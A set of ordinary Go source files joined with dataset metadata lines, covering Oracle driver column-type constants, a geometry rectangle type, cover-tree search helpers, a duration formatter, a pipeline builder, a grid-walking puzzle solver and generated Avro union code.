	// OraT defines a sql select column as a nullable Go ora.Time.
	OraT
	// S defines a sql select column as a Go string.
	S
	// OraS defines a sql select column as a nullable Go ora.String.
	OraS
	// B defines a sql select column as a Go bool.
	B
	// OraB defines a sql select column as a nullable Go ora.Bool.
	OraB
	// Bin defines a sql select column or bind parmeter as a Go byte slice.
	Bin
	// OraBin defines a sql select column as a nullable Go ora.Binary.
	OraBin
	// N defines a sql select column as a Go string for number.
	N
	// OraN defines a sql select column as a nullable Go string for number.
	OraN
	// L defins an sql select column as an ora.Lob.
	L
)
// GctName returns the symbolic name of the given GoColumnType, or an empty
// string when the value is not a known column type.
func GctName(gct GoColumnType) string {
	// Names keyed by the constant values declared above (D == 1 ... L).
	// Index 0 is intentionally left as "" — the zero value is not a valid
	// column type.
	names := [...]string{
		D:      "D",
		I64:    "I64",
		I32:    "I32",
		I16:    "I16",
		I8:     "I8",
		U64:    "U64",
		U32:    "U32",
		U16:    "U16",
		U8:     "U8",
		F64:    "F64",
		F32:    "F32",
		OraI64: "OraI64",
		OraI32: "OraI32",
		OraI16: "OraI16",
		OraI8:  "OraI8",
		OraU64: "OraU64",
		OraU32: "OraU32",
		OraU16: "OraU16",
		OraU8:  "OraU8",
		OraF64: "OraF64",
		OraF32: "OraF32",
		T:      "T",
		OraT:   "OraT",
		S:      "S",
		OraS:   "OraS",
		B:      "B",
		OraB:   "OraB",
		Bin:    "Bin",
		OraBin: "OraBin",
		N:      "N",
		OraN:   "OraN",
		L:      "L",
	}
	if n := uint(gct); n < uint(len(names)) {
		return names[n]
	}
	return ""
}
// String implements fmt.Stringer by delegating to GctName; it returns ""
// for unknown values.
func (gct GoColumnType) String() string {
	return GctName(gct)
}
// bind pool indexes
//
// Each constant selects the pool that recycles bind handles for the matching
// Go type; value, pointer and slice variants get separate pools.
const (
	bndIdxInt64 int = iota
	bndIdxInt32
	bndIdxInt16
	bndIdxInt8
	bndIdxUint64
	bndIdxUint32
	bndIdxUint16
	bndIdxUint8
	bndIdxFloat64
	bndIdxFloat32
	bndIdxNumString
	bndIdxOCINum
	// pointer variants
	bndIdxInt64Ptr
	bndIdxInt32Ptr
	bndIdxInt16Ptr
	bndIdxInt8Ptr
	bndIdxUint64Ptr
	bndIdxUint32Ptr
	bndIdxUint16Ptr
	bndIdxUint8Ptr
	bndIdxFloat64Ptr
	bndIdxFloat32Ptr
	bndIdxNumStringPtr
	bndIdxOCINumPtr
	// slice variants
	bndIdxInt64Slice
	bndIdxInt32Slice
	bndIdxInt16Slice
	bndIdxInt8Slice
	bndIdxUint64Slice
	bndIdxUint32Slice
	bndIdxUint16Slice
	bndIdxUint8Slice
	bndIdxFloat64Slice
	bndIdxFloat32Slice
	bndIdxNumStringSlice
	bndIdxOCINumSlice
	// temporal types
	bndIdxTime
	bndIdxTimePtr
	bndIdxTimeSlice
	bndIdxDate
	bndIdxDatePtr
	bndIdxDateSlice
	// strings, bools, binary and LOB types
	bndIdxString
	bndIdxStringPtr
	bndIdxStringSlice
	bndIdxBool
	bndIdxBoolPtr
	bndIdxBoolSlice
	bndIdxBin
	bndIdxBinSlice
	bndIdxLob
	bndIdxLobPtr
	bndIdxLobSlice
	bndIdxIntervalYM
	bndIdxIntervalYMSlice
	bndIdxIntervalDS
	bndIdxIntervalDSSlice
	bndIdxBfile
	bndIdxRset
	bndIdxNil
)
// define pool indexes
//
// Each constant selects the pool that recycles define handles for the
// matching select-column type.
const (
	defIdxInt64 int = iota
	defIdxInt32
	defIdxInt16
	defIdxInt8
	defIdxUint64
	defIdxUint32
	defIdxUint16
	defIdxUint8
	defIdxFloat64
	defIdxFloat32
	defIdxOCINum
	defIdxTime
	defIdxDate
	defIdxString
	defIdxNumString
	defIdxBool
	defIdxLob
	defIdxRaw
	defIdxLongRaw
	defIdxIntervalYM
	defIdxIntervalDS
	defIdxBfile
	defIdxRowid
	defIdxRset
)
package geom
import (
"fmt"
"math"
)
// A Rectangle represents a rectangle using 2 corner points.
// Only rectangles aligned with the coordinate axes can be represented.
type Rectangle struct {
	// Min is the top-left and Max the bottom-right corner; the accessors
	// below (TopLeft, BottomRight, ...) assume Min.X <= Max.X and
	// Min.Y <= Max.Y.
	Min, Max Point
}
// RectWithSideLengths creates a new rectangle of the given size whose
// minimum corner is the origin.
func RectWithSideLengths(p Point) Rectangle {
	return Rectangle{Max: p}
}

// SquareWithSideLen creates a new square of the given side length anchored
// at the origin.
func SquareWithSideLen(side float64) Rectangle {
	return RectWithSideLengths(Pt(side, side))
}

// RectContainingPoints finds the smallest rectangle containing all given
// points. With no points, the zero rectangle is returned.
func RectContainingPoints(points ...Point) Rectangle {
	if len(points) == 0 {
		return Rectangle{}
	}
	// Seed with the first point and expand over the rest.
	seed := Rectangle{Min: points[0], Max: points[0]}
	return seed.GrowToContain(points[1:]...)
}
// String implements fmt.Stringer, rendering both corner points.
func (r Rectangle) String() string {
	return fmt.Sprintf("Rect(%v / %v)", r.Min, r.Max)
}

// Width returns the width of the rectangle.
func (r Rectangle) Width() float64 {
	return r.Max.X - r.Min.X
}

// Height returns the height of the rectangle.
func (r Rectangle) Height() float64 {
	return r.Max.Y - r.Min.Y
}

// MinSide return the length of the smaller side.
// math.Min is used deliberately: it propagates NaN dimensions.
func (r Rectangle) MinSide() float64 {
	return math.Min(r.Width(), r.Height())
}

// MaxSide returns the length of the bigger side.
func (r Rectangle) MaxSide() float64 {
	return math.Max(r.Width(), r.Height())
}
// TopLeft returns the top left corner point.
//
// NOTE(review): the top/bottom naming here matches a y-down (screen)
// coordinate system where Min is the top-left corner; with a y-up
// convention the names would be flipped — confirm against Point's usage.
func (r Rectangle) TopLeft() Point {
	return r.Min
}

// TopRight returns the top right corner point.
func (r Rectangle) TopRight() Point {
	return Pt(r.Max.X, r.Min.Y)
}

// BottomRight returns the bottom right corner point.
func (r Rectangle) BottomRight() Point {
	return r.Max
}

// BottomLeft returns the bottom left corner point.
func (r Rectangle) BottomLeft() Point {
	return Pt(r.Min.X, r.Max.Y)
}

// Vertices returns a slice containing all four corner points.
// The order is clockwise starting with the top left corner.
func (r Rectangle) Vertices() []Point {
	return []Point{r.TopLeft(), r.TopRight(), r.BottomRight(), r.BottomLeft()}
}
// Center returns the center of the rectangle, the midpoint of its two
// corner points.
func (r Rectangle) Center() Point {
	sum := r.Min.Add(r.Max)
	return sum.Mul(0.5)
}
// GrowToContain returns a new rectangle expanded to contain the given points.
// If the rectangle already contains the points, a copy is returned.
func (r Rectangle) GrowToContain(points ...Point) Rectangle {
	// r is a value receiver, so all expansion happens on a local copy.
	for _, p := range points {
		px, py := p.XY()
		if px < r.Min.X {
			r.Min.X = px
		}
		if px > r.Max.X {
			r.Max.X = px
		}
		if py < r.Min.Y {
			r.Min.Y = py
		}
		if py > r.Max.Y {
			r.Max.Y = py
		}
	}
	return r
}
// Translate moves the rectangle around by the given point.
func (r Rectangle) Translate(p Point) Rectangle {
	// Shift both corners on the local copy of the value receiver.
	r.Min = r.Min.Add(p)
	r.Max = r.Max.Add(p)
	return r
}

// Scale scales the rectangle from the origin.
func (r Rectangle) Scale(factor float64) Rectangle {
	r.Min = r.Min.Mul(factor)
	r.Max = r.Max.Mul(factor)
	return r
}

// ScaleFrom scales the rectangle from a given point.
func (r Rectangle) ScaleFrom(factor float64, origin Point) Rectangle {
	// Shift the origin onto (0,0), scale, then shift back.
	shifted := r.Translate(origin.Neg())
	scaled := shifted.Scale(factor)
	return scaled.Translate(origin)
}

// ScaleFromCenter scales the rectangle from its own center.
func (r Rectangle) ScaleFromCenter(factor float64) Rectangle {
	return r.ScaleFrom(factor, r.Center())
}
// RotateAround returns the four vertices of the rectangle after a
// counterclockwise rotation around the given point.
func (r Rectangle) RotateAround(angle float64, origin Point) Polygon {
	// Vertices yields the corners clockwise from the top left, which is
	// exactly the order the polygon is built in.
	vs := r.Vertices()
	for i := range vs {
		vs[i] = vs[i].RotateAround(angle, origin)
	}
	return Poly(vs[0], vs[1], vs[2], vs[3])
}

// RotateAroundCenter returns the four vertices of the rectangle after a
// counterclockwise rotation around the center.
func (r Rectangle) RotateAroundCenter(angle float64) Polygon {
	return r.RotateAround(angle, r.Center())
}
// InnerCenterSquare returns a new square which fits inside of the rectangle.
func (r Rectangle) InnerCenterSquare() Rectangle {
w, h := r.Width(), r.Height()
s := w
if w > h {
s = h
}
halfS := float64(s) / 2
diag := Pt(halfS, halfS)
c := r.Center()
return Rectangle{
Min: c.Sub(diag),
Max: c.Add(diag),
}
} | pkg/geom/rect.go | 0.949926 | 0.798187 | rect.go | starcoder |
package covertree
import "math"
// coverSet is the working set of candidate items maintained while descending
// a cover tree, organized as layers (one layer per promotion step).
type coverSet struct {
	// layers holds the candidate items grouped by the step that produced them.
	layers []coverSetLayer
	// totalItemCount is the number of items ever added across all layers.
	totalItemCount int
	// visibleItemCount counts only items within the current distance
	// threshold (recomputed by child when layers are constrained).
	visibleItemCount int
}
// coverSetWithItems builds the initial coverSet for a traversal: the given
// items become a single layer, each paired with its distance to query
// (computed with distanceFunc) and its pre-fetched children (loadChildren is
// called once for the whole batch). An empty item slice yields an empty
// coverSet.
func coverSetWithItems(items []interface{}, parent interface{}, query interface{}, distanceFunc DistanceFunc, loadChildren func(...interface{}) ([]LevelsWithItems, error)) (coverSet, error) {
	var cs coverSet
	if len(items) > 0 {
		children, err := loadChildren(items...)
		if err != nil {
			return cs, err
		}
		itemsForLayer := make([]itemWithChildren, len(items))
		for i, item := range items {
			distance := distanceFunc(item, query)
			// children[i] corresponds positionally to items[i].
			itemsForLayer[i] = itemWithChildren{withDistance: ItemWithDistance{item, distance}, parent: parent, children: children[i]}
		}
		cs.addLayer(makeCoverSetLayer(itemsForLayer))
	}
	return cs, nil
}
// addLayer appends a layer and accounts for its items in both counters.
func (cs *coverSet) addLayer(layer coverSetLayer) {
	n := len(layer)
	cs.layers = append(cs.layers, layer)
	cs.totalItemCount += n
	cs.visibleItemCount += n
}
// atBottom reports whether no item in any layer has children left, meaning
// the descent cannot go any deeper.
func (cs coverSet) atBottom() bool {
	for _, layer := range cs.layers {
		for i := range layer {
			if layer[i].hasChildren() {
				return false
			}
		}
	}
	return true
}
// child descends one level: it constrains every existing layer to items
// within distThreshold of the query, promotes those items' children (taken
// at childLevel) that are themselves within distThreshold, and batch-loads
// the grandchildren of the promoted items so the next descent can repeat the
// process. It also reports the closest surviving parent, if any.
//
// NOTE(review): childCoverSet.layers aliases cs.layers (the slice header is
// copied but the backing array is shared), so writing the constrained layers
// below also mutates the caller's view of the layer contents — this looks
// intentional for the descent loop, but confirm before reusing cs afterwards.
func (cs coverSet) child(query interface{}, distThreshold float64, childLevel int, distanceBetween DistanceFunc, loadChildren func(...interface{}) ([]LevelsWithItems, error)) (childCoverSet coverSet, parentWithinThreshold interface{}, err error) {
	childCoverSet = coverSet{
		layers: cs.layers,
		totalItemCount: cs.totalItemCount,
		visibleItemCount: 0,
	}
	var promotedChildren []itemWithChildren
	var minParentDistance = math.MaxFloat64
	for i := range cs.layers {
		// Drop items beyond the threshold; layers appear to be ordered by
		// ascending distance (index 0 is treated as the closest survivor).
		layer := cs.layers[i].constrainedToDistance(distThreshold)
		childCoverSet.layers[i] = layer
		childCoverSet.visibleItemCount += len(layer)
		// Track the globally closest surviving parent across all layers.
		if len(layer) > 0 && layer[0].withDistance.Distance < minParentDistance {
			parentWithinThreshold = layer[0].withDistance.Item
			minParentDistance = layer[0].withDistance.Distance
		}
		for _, csItem := range layer {
			// Promote children at this level that fall inside the threshold.
			for _, childItem := range csItem.takeChildrenAt(childLevel) {
				if childDist := distanceBetween(childItem, query); childDist <= distThreshold {
					promotedChild := itemWithChildren{withDistance: ItemWithDistance{childItem, childDist}, parent: csItem.withDistance.Item}
					promotedChildren = append(promotedChildren, promotedChild)
				}
			}
		}
	}
	if len(promotedChildren) > 0 {
		// Batch-load the grandchildren of every promoted child so the new
		// layer is self-contained for the next descent step.
		children := make([]interface{}, len(promotedChildren))
		for i := range promotedChildren {
			children[i] = promotedChildren[i].withDistance.Item
		}
		grandchildren, err := loadChildren(children...)
		if err != nil {
			return childCoverSet, nil, err
		}
		for i := range promotedChildren {
			promotedChildren[i].children = grandchildren[i]
		}
		childCoverSet.addLayer(makeCoverSetLayer(promotedChildren))
	}
	return
}
// bound returns the distance of the maxItems-th nearest visible item, or
// maxDist when fewer than maxItems items lie within maxDist. It performs a
// k-way merge over the per-layer lists (each layer appears to be ordered by
// ascending distance — see makeCoverSetLayer) without materializing results.
func (cs coverSet) bound(maxItems int, maxDist float64) float64 {
	var count = 0
	// minIndices[i] is the merge cursor into layer i: everything before it
	// has already been counted.
	var minIndices = make([]int, len(cs.layers))
	var boundDistance = maxDist
	for count < maxItems {
		// Pick the layer whose cursor points at the nearest remaining item.
		var minLayerIndex = -1
		for layerIndex, layer := range cs.layers {
			minIndex := minIndices[layerIndex]
			if minIndex >= len(layer) {
				continue
			}
			itemDistance := layer[minIndex].withDistance.Distance
			if minLayerIndex == -1 || itemDistance < boundDistance {
				minLayerIndex = layerIndex
				boundDistance = itemDistance
			}
		}
		// Stop when every layer is exhausted or the next candidate is too far.
		if minLayerIndex == -1 || boundDistance > maxDist {
			break
		}
		count++
		minIndices[minLayerIndex]++
	}
	if count == maxItems {
		return boundDistance
	}
	return maxDist
}
// closest returns up to maxItems items within maxDist of the query, nearest
// first, by k-way merging the per-layer lists (each layer appears to be
// ordered by ascending distance — see makeCoverSetLayer).
func (cs coverSet) closest(maxItems int, maxDist float64) []ItemWithDistance {
	var results []ItemWithDistance
	// minIndices[i] is the merge cursor into layer i: everything before it
	// has already been consumed into results.
	var minIndices = make([]int, len(cs.layers))
	for len(results) < maxItems {
		// Pick the layer whose cursor points at the globally nearest
		// remaining item.
		var minItem *ItemWithDistance
		var minLayerIndex = -1
		for layerIndex, layer := range cs.layers {
			minIndex := minIndices[layerIndex]
			if minIndex >= len(layer) {
				continue
			}
			item := &layer[minIndex].withDistance
			if minLayerIndex == -1 || item.Distance < minItem.Distance {
				minLayerIndex = layerIndex
				minItem = item
			}
		}
		// Stop when all layers are exhausted or the nearest candidate is
		// out of range.
		if minLayerIndex == -1 || minItem.Distance > maxDist {
			break
		}
		results = append(results, *minItem)
		minIndices[minLayerIndex]++
	}
	return results
}
package args
import (
"fmt"
"math"
"strings"
"time"
)
/*
NB! "µs" require 3 bytes, not 2 bytes, hence the difference with "ms" on a number of decimal positions
*/
// DurationFixedLen formats d as a human-readable duration aimed at a fixed
// display width of expectedLen characters; the display unit is derived from
// the magnitude of d itself.
func DurationFixedLen(d time.Duration, expectedLen int) string {
	return durationFixedLen(d, d, expectedLen)
}
// durationFixedLen formats d using the display unit derived from base. The
// two arguments differ when fmtMetric re-enters with base*1000 after the
// value overflows the available width. Sub-minute units are rendered by
// fmtMetric, minute-and-above by fmtAboveSeconds.
func durationFixedLen(d, base time.Duration, expectedLen int) string {
	base, baseUnit := metricDurationBase(base)
	if base < time.Minute {
		return fmtMetric(d, base, baseUnit, expectedLen)
	}
	return fmtAboveSeconds(d, expectedLen)
}
// fmtMetric renders d in multiples of base with the given unit suffix (e.g.
// "12.34ms"), padding with decimals to fill expectedLen characters when there
// is room. If the rounded value needs more integer digits than the width
// allows, it retries via durationFixedLen with the next larger metric unit
// (base*1000).
func fmtMetric(d time.Duration, base time.Duration, baseUnit string, expectedLen int) string {
	// w is the number of character positions left for digits (and the dot).
	w := expectedLen - len(baseUnit)
	v := float64(d) / float64(base)
	if w < 1 {
		w = 1
	}
	vRounded := math.Round(v)
	if vRounded >= math.Pow10(w) {
		// Too many integer digits for the width — escalate to the next unit.
		return durationFixedLen(d, base*1000, expectedLen)
	}
	if w < 3 || vRounded >= math.Pow10(w-2) {
		// No room for "." plus at least one decimal — print just the integer.
		return fmt.Sprintf("%.0f%s", v, baseUnit)
	}
	b := strings.Builder{}
	b.Grow(w + len(baseUnit))
	vInt, vFrac := math.Modf(v)
	b.WriteString(fmt.Sprintf("%d.", uint64(vInt)))
	// Fill the remaining width with zero-padded decimals.
	decimalCount := w - b.Len()
	decimals := uint64(vFrac * math.Pow10(decimalCount))
	b.WriteString(fmt.Sprintf("%0*d", decimalCount, decimals))
	b.WriteString(baseUnit)
	return b.String()
}
func metricDurationBase(d time.Duration) (time.Duration, string) {
if d < 10*time.Minute {
switch {
case d > 500*time.Millisecond:
return time.Second, "s"
case d > 500*time.Microsecond:
return time.Millisecond, "ms"
default:
return time.Microsecond, "µs"
}
}
return time.Minute, "m"
}
// fmtAboveSeconds renders d as a two-unit value: minutes+seconds for up to
// ten hours' worth of minutes, hours+minutes beyond that. The actual layout
// and width-based rounding is delegated to fmtPortions.
func fmtAboveSeconds(d time.Duration, expectedLen int) string {
	totalMinutes := d / time.Minute
	seconds := (d % time.Minute) / time.Second
	if totalMinutes < 600 {
		return fmtPortions(uint64(seconds), "s", uint64(totalMinutes), "m", expectedLen)
	}
	hours := totalMinutes / 60
	minutes := totalMinutes % 60
	return fmtPortions(uint64(minutes), "m", uint64(hours), "h", expectedLen)
}
// fmtPortions renders a two-unit value such as "3m20s" or "2h05m" aiming at
// expectedLen characters. valueLo must be a sub-unit count below 60 (enforced
// by panic). When the width is too tight for both portions, the low portion
// is either dropped or rounded up into the high one (round-half-up at >30).
func fmtPortions(valueLo uint64, unitLo string, valueHi uint64, unitHi string, expectedLen int) string {
	if valueLo > 59 {
		panic("illegal value")
	}
	switch {
	case valueHi > 0:
		break
	case expectedLen-len(unitLo) < 2:
		// Low-only value that doesn't fit two digits: a large low value is
		// rounded up into one high unit, a small one is printed as-is
		// (via the fallthrough into the default case).
		if valueLo > 9 {
			if valueLo > 30 {
				valueLo = 0
				valueHi++
			}
			break
		}
		fallthrough
	default:
		// Low-only value that fits — print it directly.
		return fmt.Sprintf("%d%s", valueLo, unitLo)
	}
	vHi := fmt.Sprintf("%d%s", valueHi, unitHi)
	if len(vHi)+2+len(unitLo) > expectedLen {
		// No room for the low portion; round it into the high unit instead.
		if valueLo > 30 {
			return fmt.Sprintf("%d%s", valueHi+1, unitHi)
		}
		return vHi
	}
	return vHi + fmt.Sprintf("%02d%s", valueLo, unitLo)
}
// BitCountToMaxDecimalCount estimates how many decimal digits a value of the
// given bit length occupies; zero bits map to zero digits.
func BitCountToMaxDecimalCount(bitLen int) int {
	if bitLen == 0 {
		return 0
	}
	// log2(10) = 3.3219280948873623..., held in fixed point with six
	// decimal places so the division stays in integer arithmetic.
	const log2of10Fixed = 3321928
	return int(1 + (uint64(bitLen-1)*1000000)/log2of10Fixed)
}
package description
// Provides an interface to assemble a D3M pipeline DAG as a protobuf PipelineDescription. This created
// description can be passed to a TA2 system for execution and inference. The pipeline description is
// covered in detail at https://gitlab.com/datadrivendiscovery/metalearning#pipeline with example JSON
// pipeline definitions found in that same repository.
import (
"fmt"
"github.com/pkg/errors"
"github.com/uncharted-distil/distil-compute/pipeline"
)
// PipelineBuilder compiles a pipeline DAG into a protobuf pipeline description that can
// be passed to a downstream TA2 for inference (optional) and execution.
type PipelineBuilder struct {
	// name and description label the generated pipeline description.
	name string
	description string
	// inputs are the named pipeline inputs; outputs reference step output data.
	inputs []string
	outputs []DataRef
	// steps are the pipeline steps in execution order.
	steps []Step
	// compiled guards against Compile being invoked more than once.
	compiled bool
}
// NewPipelineBuilder creates a new pipeline builder instance over the given
// inputs, outputs and steps. Apply Compile to produce the protobuf pipeline
// description.
func NewPipelineBuilder(name string, description string, inputs []string, outputs []DataRef, steps []Step) *PipelineBuilder {
	return &PipelineBuilder{
		name:        name,
		description: description,
		inputs:      inputs,
		outputs:     outputs,
		steps:       steps,
	}
}
// GetSteps returns the builder's steps in execution order (set at
// construction; Compile does not modify them).
func (p *PipelineBuilder) GetSteps() []Step {
	return p.steps
}
// Compile creates the protobuf pipeline description from the step graph. It can only be
// called once.
func (p *PipelineBuilder) Compile() (*pipeline.PipelineDescription, error) {
if p.compiled {
return nil, errors.New("compile failed: pipeline already compiled")
}
if len(p.steps) == 0 {
return nil, errors.New("compile failed: pipeline requires at least 1 step")
}
// Set the inputs
pipelineInputs := []*pipeline.PipelineDescriptionInput{}
for _, input := range p.inputs {
pipelineInputs = append(pipelineInputs, &pipeline.PipelineDescriptionInput{
Name: input,
})
}
// Set the outputs
pipelineOutputs := []*pipeline.PipelineDescriptionOutput{}
for i, output := range p.outputs {
output := &pipeline.PipelineDescriptionOutput{
Name: fmt.Sprintf("%s %d", pipelineOutputsName, i),
Data: output.RefString(),
}
pipelineOutputs = append(pipelineOutputs, output)
}
// Compile the build steps
compileResults := []*pipeline.PipelineDescriptionStep{}
for _, step := range p.steps {
compileResult, err := step.BuildDescriptionStep()
if err != nil {
return nil, err
}
compileResults = append(compileResults, compileResult)
}
pipelineDesc := &pipeline.PipelineDescription{
Name: p.name,
Description: p.description,
Steps: compileResults,
Inputs: pipelineInputs,
Outputs: pipelineOutputs,
}
// mark the entire pipeline as compiled so it can't be compiled again
p.compiled = true
return pipelineDesc, nil
} | primitive/compute/description/builder.go | 0.84228 | 0.476884 | builder.go | starcoder |
package main
import (
"bufio"
"errors"
"fmt"
"math"
"os"
"strconv"
"strings"
)
// For debug output: export DEBUG=1

// Type Step represents a step from the input file, which contains a direction
// (left or right) and the number of blocks to travel.
type Step struct {
	Direction Direction
	Steps int
}

// Type Direction represents either Left or Right.
type Direction int

// Direction constants.
const (
	Left Direction = iota
	Right
)

// Type Facing represents what direction we're facing.
type Facing int

// Facing constants. The order matters: Turn relies on North..West being
// consecutive values so it can rotate by incrementing and decrementing.
const (
	North Facing = iota
	East
	South
	West
)

// Type Coordinate logs an X and Y pair for places we've been.
type Coordinate struct {
	X int
	Y int
}

// Type Visited stores a map of coordinates we've been to.
type Visited map[Coordinate]bool
// main reads the step list named on the command line, walks it from the
// origin facing north, and reports the Manhattan distance to the first
// location visited twice (the Easter Bunny HQ).
func main() {
	if len(os.Args) < 2 {
		fmt.Println("Usage: main.go <input file>")
		os.Exit(1)
	}
	// Get the list of steps to follow.
	steps, err := ParseInput(os.Args[1])
	if err != nil {
		panic(err)
	}
	// Track our offsets starting at 0,0 and facing north to find where the
	// directions lead to.
	x, y, facing := 0, 0, North
	// Also keep track of where we've been. The Easter Bunny HQ is at the first
	// location that we visit twice. The composite literal creates a non-nil
	// map, so writes through the pointer are safe.
	visited := &Visited{}
	visited.Visit(Coordinate{0, 0})
	// Follow the steps.
	for _, step := range steps {
		// Turn first.
		facing.Turn(step.Direction)
		// Print output for debugging.
		Debug("Step: %v - Now Facing: %v - Coords: (%d,%d)\n", step, facing, x, y)
		done := visited.Travel(&x, &y, facing, step.Steps)
		if done {
			break
		}
	}
	// And our verdict is... the Manhattan distance from the origin.
	distance := int(math.Abs(float64(x)) + math.Abs(float64(y)))
	fmt.Printf("The Easter Bunny HQ is %d blocks away.\n", distance)
}
// Turn rotates the facing one step: clockwise for Right, counterclockwise
// otherwise, wrapping around the compass at both ends.
func (f *Facing) Turn(direction Direction) {
	if direction == Right {
		*f++
	} else {
		*f--
	}
	// Wrap around the compass bounds.
	switch {
	case *f < North:
		*f = West
	case *f > West:
		*f = North
	}
}
// Travel moves our position along a vector and returns true if we've stepped
// over the same position twice.
func (v *Visited) Travel(x, y *int, facing Facing, distance int) bool {
	// Walk one block at a time so every intermediate coordinate is recorded.
	for step := 0; step < distance; step++ {
		switch facing {
		case North:
			*y++
		case East:
			*x++
		case South:
			*y--
		case West:
			*x--
		}
		// Record the block we just stepped onto; a repeat means we're done.
		if v.Visit(Coordinate{*x, *y}) {
			return true
		}
	}
	return false
}
// Visit marks a spot we've visited and returns true if it's a duplicate spot.
func (v *Visited) Visit(c Coordinate) bool {
	Debug("Visit coord: %v\n", c)
	if _, seen := (*v)[c]; seen {
		fmt.Printf("We stepped back over our tracks at %v!\n", c)
		return true
	}
	(*v)[c] = true
	return false
}
// ParseInput parses the input text file and returns an array of Steps.
// Each line holds comma-separated entries like "R5" or "L2": a direction
// letter followed by a block count.
func ParseInput(file string) ([]Step, error) {
	fh, err := os.Open(file)
	if err != nil {
		return nil, err
	}
	defer fh.Close()
	// Make a line scanner.
	scanner := bufio.NewScanner(fh)
	scanner.Split(bufio.ScanLines)
	// Make the buffer of steps.
	steps := []Step{}
	for scanner.Scan() {
		line := strings.TrimSpace(scanner.Text())
		if len(line) == 0 {
			continue
		}
		// Look for steps. Steps look like "R5" or "L2": a direction and a
		// number of blocks to travel that direction.
		for _, entry := range strings.Split(line, ",") {
			entry = strings.TrimSpace(entry)
			// Skip empty entries (e.g. a trailing comma) instead of
			// panicking on entry[0] below.
			if entry == "" {
				continue
			}
			direction := entry[0]
			blocks, err := strconv.Atoi(entry[1:])
			if err != nil {
				return nil, err
			}
			switch direction {
			case 'R':
				steps = append(steps, Step{Right, blocks})
			case 'L':
				steps = append(steps, Step{Left, blocks})
			default:
				// errors.New(fmt.Sprintf(...)) kept (rather than
				// fmt.Errorf) so the file-level "errors" import stays used.
				return nil, errors.New(fmt.Sprintf("Found an invalid step entry: %v", entry))
			}
		}
	}
	// Surface any read error from the scanner; previously it was silently
	// ignored, turning truncated input into a short step list.
	if err := scanner.Err(); err != nil {
		return nil, err
	}
	return steps, nil
}
// Debug prints a debug message, but only when the DEBUG environment variable
// is set to a non-empty value.
func Debug(template string, a ...interface{}) {
	if len(os.Getenv("DEBUG")) == 0 {
		return
	}
	fmt.Printf(template, a...)
}
* SOURCE:
* Record.avsc
*/
package dtsavro
import (
"encoding/json"
"fmt"
"io"
"github.com/actgardner/gogen-avro/v7/vm"
"github.com/actgardner/gogen-avro/v7/vm/types"
)
type UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum int
const (
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumInteger UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 1
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumCharacter UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 2
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDecimal UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 3
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumFloat UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 4
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestamp UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 5
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDateTime UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 6
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestampWithTimeZone UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 7
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryGeometry UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 8
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextGeometry UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 9
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryObject UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 10
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextObject UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 11
